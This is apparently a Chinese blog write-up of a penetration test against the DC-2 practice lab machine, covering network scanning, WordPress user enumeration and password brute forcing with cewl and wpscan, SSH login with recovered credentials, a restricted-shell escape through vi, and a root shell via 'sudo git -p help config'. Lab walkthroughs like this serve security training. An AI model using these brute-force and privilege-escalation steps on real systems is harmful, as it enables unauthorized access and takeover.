kali渗透CD-2

本文详细描述了在DC-2靶机上进行渗透测试的过程,包括信息收集、漏洞发现(如使用Nmap扫描、CEWL抓取密码)、漏洞利用(如SSH登录、权限提升尝试)、以及最终的提权方法(通过git提权获取flag)。
摘要由CSDN通过智能技术生成

环境搭建

DC-2靶机搭建

DC-2镜像下载地址
教程大家自行C一下,我不多说了。

一.信息收集

寻找靶机的IP地址

arp-scan -l

DC-2的IP地址:192.168.178.227

扫描靶机开放端口

nmap -sT -p- --min-rate 2000 192.168.178.227

在这里插入图片描述
可以看到有80和7744端口开放

扫描靶机开放端口的服务

nmap -sV -T4 -O -p 80,7744 192.168.178.227


在这里插入图片描述
80是http服务,7744是ssh端口服务

二. 漏洞发现

访问网页

先修改hosts文件(Windows需要administrator用户权限)
C:/windows/system32/drivers/etc/hosts文件绑定IP地址和域名
在这里插入图片描述
访问http://dc-2
访问成功

使用drib工具扫描网页目录
在这里插入图片描述
可以看到wp-admin目录,反问试试

在这里插入图片描述
访问成功
破解一下试试
先修改kali中的hosts文件,绑定域名和IP(和windows一样)
使用cewl http://dc-2 -w pwd.txt 把网页上的英文字母下载下来生成pwd.txt密码字典

cewl http://dc-2 -w pwd.txt 

在这里插入图片描述
扫描登录用户

wpscan --url dc-2 --enumerate

在这里插入图片描述
发现出现三个用户,把他们写入用户字典里面
在这里插入图片描述
尝试使用wordpress爆破

wpscan --url http://dc-2/ -U user.txt -P pwd.txt

在这里插入图片描述
密码到手

jerry;adipiscing
tom;parturient

再网页登陆界面登陆jerry的账号密码
在这里插入图片描述
发现了flag2

三.漏洞利用

tom用户登录(信息收集的时候我们扫描到DC-2的ssh7744端口开放)

ssh tom@192.168.178.227 -p 7744 

在这里插入图片描述
登陆成功
但是发现不能使用任何命令,发现权限很低。

后来发现是靶机DC-2的环境变量有问题。使用export查看变量 受限shell是LinuxShell限制一些bash shell中的功能

export PATH=$PATH:/bin/

可以使用用vi编辑器穿件shell文件
用vi的末行模式下输入 ——> :set shell=/bin/bash
然后应用这个shell ——> : shell

在这里插入图片描述
在这里插入图片描述

四.提权

尝试sudo提权、SUID提权、/etc/passwd 、/etc/crontab、隐藏文件提权都不行。

所以现在尝试切换到jerry用户。

su jerry

在这里插入图片描述

在这里插入图片描述

flag提示git 提权

sudo git -p help config
!/bin/sh

使用whoami查看权限
然后进入根目录查找flag

cd /
find / -name *flag*

在这里插入图片描述

打开找到的文件

cat /root/final*

在这里插入图片描述
拿下!

  • 18
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值